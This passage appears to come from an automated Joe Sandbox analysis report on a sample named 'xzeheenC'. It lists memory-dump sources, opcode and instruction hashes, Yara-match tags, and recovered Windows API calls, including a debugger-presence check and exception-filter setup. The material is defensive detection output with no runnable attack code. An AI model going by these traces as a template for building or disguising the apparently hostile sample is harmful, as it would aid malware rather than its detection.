                                                                                                                        • Opcode Fuzzy Hash: 7461bfa445b22e354366cf413e5dbeb127c77057ae9548eafdc3a2a3eb6d1661
                                                                                                                        • Instruction Fuzzy Hash: 5F41C675E01218CFEB68CFAAD9407DEBBF2AF89304F5080AAC418B7255DB345A85CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: fed7f706a34d56cc2e4e8b805386637e47b7c75a82a3bfe80dea71b354966cc1
                                                                                                                        • Instruction ID: 645fc9163f2730079e72e5cb0c6f4286c951f25e6a9c1bc024676cdcb3162e6c
                                                                                                                        • Opcode Fuzzy Hash: fed7f706a34d56cc2e4e8b805386637e47b7c75a82a3bfe80dea71b354966cc1
                                                                                                                        • Instruction Fuzzy Hash: 3341D475E01218CFEB64CFAAD9407DEBBF2AF89300F6080AAC459A7251DB345A85CF55
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 70d337b55cbee5d0e1ad0d04ab13dade4d718f508a9ecf0b8d067d5bb3b56333
                                                                                                                        • Instruction ID: d7af99ca0e5e8d55d4a62cf90ebd005b5c3bae02ccfd0529ebd20df65ecaa6d6
                                                                                                                        • Opcode Fuzzy Hash: 70d337b55cbee5d0e1ad0d04ab13dade4d718f508a9ecf0b8d067d5bb3b56333
                                                                                                                        • Instruction Fuzzy Hash: CE41D375E01218CFEB68CFBAD9407DEBBF2AF89300F5080A9C518A7255DB345A86CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e03cf60f48ca553e214eaee0641e0c68dd076d0169110a07a5e100abbbcfc451
                                                                                                                        • Instruction ID: bc30f1d8ace8b0175c18d79f323b2c3c3c66ad0b7bff5210c4c1de467eeeb183
                                                                                                                        • Opcode Fuzzy Hash: e03cf60f48ca553e214eaee0641e0c68dd076d0169110a07a5e100abbbcfc451
                                                                                                                        • Instruction Fuzzy Hash: 8C41C575E01218CFEB68CFBAC9507DEBBF2AF89300F5080A9C418A7251DB755A85CF55
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eaaa4e3e9f331647f2319ccd5e74a222baf1277f5f4ff14c595ebaaaf300157f
                                                                                                                        • Instruction ID: abd4823ce7940a1d757598470e84ea38cd4641c0facf2d7900f428b97866c16e
                                                                                                                        • Opcode Fuzzy Hash: eaaa4e3e9f331647f2319ccd5e74a222baf1277f5f4ff14c595ebaaaf300157f
                                                                                                                        • Instruction Fuzzy Hash: 2D41C275E01218CFDB68CFBAD94079EBBF2AF89300F5080AAC418A7251DB345A86CF55
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 88b4bc9a2b190ba94364f5c01bea9f3dfac00bf951bc49e15a062bfb4de3aed0
                                                                                                                        • Instruction ID: d2add9395939bca494ebca38b32b40cfdb75abaecca7be1ab59c1f0cfb443eef
                                                                                                                        • Opcode Fuzzy Hash: 88b4bc9a2b190ba94364f5c01bea9f3dfac00bf951bc49e15a062bfb4de3aed0
                                                                                                                        • Instruction Fuzzy Hash: A141E475E01218CFEB68CFAAC9417DEBBF2AF89304F5080AAC418B7251DB345A85CF55
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f6d170cc2d60c4bcadad6ad7d0a5c3d2b67917964a634d62e5bc3ae6732ea277
                                                                                                                        • Instruction ID: c004b984f8ae35b7091e0f0cc23036309098aac93bbf30e812506e3fdec7a7b0
                                                                                                                        • Opcode Fuzzy Hash: f6d170cc2d60c4bcadad6ad7d0a5c3d2b67917964a634d62e5bc3ae6732ea277
                                                                                                                        • Instruction Fuzzy Hash: CD41B475E01218CFDB64CFAAD9507DEBBF2AF89300F50C0AAC458A7255DB345A85CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7ea65028c982d7fd75cc22b00712e69c49bbd7ca10c23e22325f9f0a1d83ddea
                                                                                                                        • Instruction ID: a35a9d664c724845db862092d49ee7b162a8da1476af6c5caa7be21b27db08f4
                                                                                                                        • Opcode Fuzzy Hash: 7ea65028c982d7fd75cc22b00712e69c49bbd7ca10c23e22325f9f0a1d83ddea
                                                                                                                        • Instruction Fuzzy Hash: C741F4B5E012188FEB28CFAAD8407DEBBF2AF89300F5080A9C408A7251DB345A85CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b7c9dd472aef26da2199c4262f7561798f00f306ea759116962d8f9dca185e66
                                                                                                                        • Instruction ID: 425a8ba0e6dcb1bd376865540065b2f31a88151a9b15a7af1ad32e00740327da
                                                                                                                        • Opcode Fuzzy Hash: b7c9dd472aef26da2199c4262f7561798f00f306ea759116962d8f9dca185e66
                                                                                                                        • Instruction Fuzzy Hash: 6441C275E11218CFEB68CFAAC8407DEBBF2BF89300F5080AAC518A7251DB345A85CF51
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 51798752164fe4b468d584309fa25b3c142103d89e3af4ed163564de72323117
                                                                                                                        • Instruction ID: 06b882f584793a29b22b7ffd45fb14bb94d1b3779dbbe846c117b6cb8b90fdbb
                                                                                                                        • Opcode Fuzzy Hash: 51798752164fe4b468d584309fa25b3c142103d89e3af4ed163564de72323117
                                                                                                                        • Instruction Fuzzy Hash: 5D41E375E11218CFEB28CFAAC8407DEBBF2AF89300F5080A9C418B7252DB345A85CF55
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1832f5fd07c25c36b23aed139bd37e6f95c0efe17a2b228284429ba62e8cd929
                                                                                                                        • Instruction ID: 698c78d3be059455b32962a4924bcd5b5c32eaccf28a3457a1514e090531b414
                                                                                                                        • Opcode Fuzzy Hash: 1832f5fd07c25c36b23aed139bd37e6f95c0efe17a2b228284429ba62e8cd929
                                                                                                                        • Instruction Fuzzy Hash: 2741E675E01218CFEB68CFAAC9407DEBBF2BF89304F5480A9C418A7295DB345A85CF55
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d4b63ce931b9229fe5fd995947fe8ee66f80c3e48e1608a603d0bec75b7bc09a
                                                                                                                        • Instruction ID: 3ae5c3bf879a9d93bc0078f1792dffad4367bc0411eb0b9bcda82ddc2e25d1c3
                                                                                                                        • Opcode Fuzzy Hash: d4b63ce931b9229fe5fd995947fe8ee66f80c3e48e1608a603d0bec75b7bc09a
                                                                                                                        • Instruction Fuzzy Hash: 9041C675E01218CFDB68CFAAD9907DEBBF2AF89300F5080AAC418A7255DB345A85CF55
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c6b2008a9690fa9ec3666dee6967d27000800e0e2d61b461863d5fcadb06ff37
                                                                                                                        • Instruction ID: bd0b314b2f0845006222257e2379f3bb5e04c4505d066f5cfa5c82dfbbe5d1cd
                                                                                                                        • Opcode Fuzzy Hash: c6b2008a9690fa9ec3666dee6967d27000800e0e2d61b461863d5fcadb06ff37
                                                                                                                        • Instruction Fuzzy Hash: 4801D672600254AFDB058EA59C41BDF7BAAEF88750F148069FA14C7281C772C812DB90
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 91d8fe58ce28d9aca80501b87cfbe23d372f2707ad6d4de0a9183581eb7cd7d3
                                                                                                                        • Instruction ID: 2a0c53aa66f53e12fa6b8af6105b3cae4011d5e9ef63e19679ee5b84d03d6e41
                                                                                                                        • Opcode Fuzzy Hash: 91d8fe58ce28d9aca80501b87cfbe23d372f2707ad6d4de0a9183581eb7cd7d3
                                                                                                                        • Instruction Fuzzy Hash: BBF09633B086645FCB0657A9B4255AEBBE9DFC576071400BBE544D72A1CE62CC06C791
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 087706345f93007cdc7183b18bf499f105e989115152bc0f708eab37a4823d4b
                                                                                                                        • Instruction ID: 0dd08871ed3ae9104422300d9d932151a8581a689bba77053c785bd86169b582
                                                                                                                        • Opcode Fuzzy Hash: 087706345f93007cdc7183b18bf499f105e989115152bc0f708eab37a4823d4b
                                                                                                                        • Instruction Fuzzy Hash: 4B011970E003299FCF44DFB9C9546DEBBF5BF88200F50852AD919EB250E73899028FA1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: cd844b01bd1f1fc999940e43ddc1d23106d8c2acdb907114d618fdae99341a1c
                                                                                                                        • Instruction ID: 98e583ebe02ce38340a8dafb999651c6f7002ea6557c91e9e6890021bbbf1edb
                                                                                                                        • Opcode Fuzzy Hash: cd844b01bd1f1fc999940e43ddc1d23106d8c2acdb907114d618fdae99341a1c
                                                                                                                        • Instruction Fuzzy Hash: 3AF0F6769002089E8B50DFA9D8419EFBBFAEF58350B50462ADA05D3211E6309A158BE1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e464eb2fad96ff6fe29552198d61b07499c8dae1f1165372f2cbafd0a83cc416
                                                                                                                        • Instruction ID: 555180d585a35a4b9a12d8e751dcec7d978712f8b60196f80d27c4b31ace58e5
                                                                                                                        • Opcode Fuzzy Hash: e464eb2fad96ff6fe29552198d61b07499c8dae1f1165372f2cbafd0a83cc416
                                                                                                                        • Instruction Fuzzy Hash: C2F03A353401059FC7048F59D494D6ABBAAFF88724B648069E90987331CB719C51CB50
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 129bf7380cb58cb61c0445a66c6adf38f96378073d500e58048d65a4221cb431
                                                                                                                        • Instruction ID: a2ce5f0b8e6f424d973098c7adac48ec6fa733ae115aff7bd25e4a3416625d4f
                                                                                                                        • Opcode Fuzzy Hash: 129bf7380cb58cb61c0445a66c6adf38f96378073d500e58048d65a4221cb431
                                                                                                                        • Instruction Fuzzy Hash: CEF082367101118FC7489A6AD898D2A7BBAEFC66257544069F506CB3A5EE60DC018790
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3473974376.0000000020A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 20A80000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20a80000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 755b672ca091792bd03a64edaeb90a73b80a02902ceb3a40de92f84fb6d2d741
                                                                                                                        • Instruction ID: ea8e48d96da270a1c3bffd976c3b7439941dda0cac625e75e3546de33241ab4c
                                                                                                                        • Opcode Fuzzy Hash: 755b672ca091792bd03a64edaeb90a73b80a02902ceb3a40de92f84fb6d2d741
                                                                                                                        • Instruction Fuzzy Hash: 72D0C736300124678B051A4994448AE7B5FE7C9771705802AFD4583304CE724D2197E5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: eecc10d3e4c7e1e4c2a9883f5c869cbb35c1b742ead0de3d821dcb71601b0e2c
                                                                                                                        • Instruction ID: 6ddf00d2d1dee9bccfd638df521663c1d5ca8f638d31b8fe92e05c4b3df4b900
                                                                                                                        • Opcode Fuzzy Hash: eecc10d3e4c7e1e4c2a9883f5c869cbb35c1b742ead0de3d821dcb71601b0e2c
                                                                                                                        • Instruction Fuzzy Hash: 9BC012340842194BC68AEB75E9C69557B1EFAC0214BA08A24E10E06169EFF8ED49C7D0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3474108716.0000000020AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20AA0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_20aa0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5b74f2633cee37632b59b68bd87aae7ea879328f9dff4a4e1836441ec426afa5
                                                                                                                        • Instruction ID: f9dd07299643a207639900588955c9272653a6858f5ae2ce0c8dbb7efa725ca7
                                                                                                                        • Opcode Fuzzy Hash: 5b74f2633cee37632b59b68bd87aae7ea879328f9dff4a4e1836441ec426afa5
                                                                                                                        • Instruction Fuzzy Hash: BEC08C3C6043004FEF118B10E66CB41BBB1DF84304F0480A4D809CB266C320DC82C600
                                                                                                                        APIs
                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                        • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000002.3435180894.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2579439406-0
                                                                                                                        • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                        • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                        • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                        • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000002.3435180894.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3859560861-0
                                                                                                                        • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                        • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                                                        • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                                                        • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3472370573.000000001F6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F6E0000, based on PE: false
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_1f6e0000_xzeheenC.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: .5uq
                                                                                                                        • API String ID: 0-910421107
                                                                                                                        • Opcode ID: f31c303c22fdbbefbd617d6ec9d84944ea964447e164cebeeb3f200db977c261
                                                                                                                        • Instruction ID: c6b76fb551e2e161564b2cfd931ff36939c0c0706c4fe4bd2b933b5164b79a49
                                                                                                                        • Opcode Fuzzy Hash: f31c303c22fdbbefbd617d6ec9d84944ea964447e164cebeeb3f200db977c261
                                                                                                                        • Instruction Fuzzy Hash: B8728C75E01228CFDB64DF69C984BDDBBB2AB89300F1081E9D809A7255DB35AE85CF50
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.3435180894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000002.3435180894.0000000000441000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                        • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                                                        • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                                                        • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                                                        APIs
                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00000000), ref: 004170C5
                                                                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                        • __freea.LIBCMT ref: 004172A4
                                                                                                                        • __freea.LIBCMT ref: 004172AD
                                                                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                        • _malloc.LIBCMT ref: 00417362
                                                                                                                        • _memset.LIBCMT ref: 00417384
                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                        • __freea.LIBCMT ref: 004173CF
                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3809854901-0
                                                                                                                        • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                        • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                        APIs
                                                                                                                        • _malloc.LIBCMT ref: 004057DE
                                                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                        • _malloc.LIBCMT ref: 00405842
                                                                                                                        • _malloc.LIBCMT ref: 00405906
                                                                                                                        • _malloc.LIBCMT ref: 00405930
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _malloc$AllocateHeap
                                                                                                                        • String ID: 1.2.3
                                                                                                                        • API String ID: 680241177-2310465506
                                                                                                                        • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                        • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                        • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                                                                        • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmp
